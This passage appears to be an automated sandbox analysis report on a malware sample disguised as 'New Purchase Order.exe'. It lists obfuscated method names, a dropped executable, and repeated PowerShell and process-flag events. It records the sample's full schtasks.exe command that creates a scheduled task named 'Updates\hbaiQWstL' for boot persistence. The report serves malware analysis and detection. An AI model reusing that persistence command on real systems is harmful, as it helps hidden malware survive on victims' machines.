            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, T0eQ8UBALokRnXqfN7.csHigh entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, HHhsU2qAYMPla5aIDYc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, q3VKdmLQewPeuA4N72.csHigh entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, ckj7u2pGAaf8INieFh.csHigh entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, JwTBk9IPoaxFjSc6xW.csHigh entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SRCqlIJcgwJZFuosxj.csHigh entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, VgQkbRn23bHy4GHxvj.csHigh entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, OEhUlQ281Owx1tmo6p.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, OYyLu3T6BDUCTl9P9j.csHigh entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SWK57FcddZRYqoRlo9.csHigh entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, IWOHEthbFFReLStnZY.csHigh entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, x9Oa4nuLVFFG6CaiRN.csHigh entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, nLS36HZfw7qLEHMs2t.csHigh entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, DwiqYnyOeNkuOV9dDN.csHigh entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, r6uWPH54nyDsQ5R73a.csHigh entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.csHigh entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.csHigh entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, raAPqr4eix1YefVSjY.csHigh entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, ArHCtDC5S2Y8AYEOBV.csHigh entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, EQ0ZWrk6M5lhuWnFO8.csHigh entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, T0eQ8UBALokRnXqfN7.csHigh entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\hbaiQWstL.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
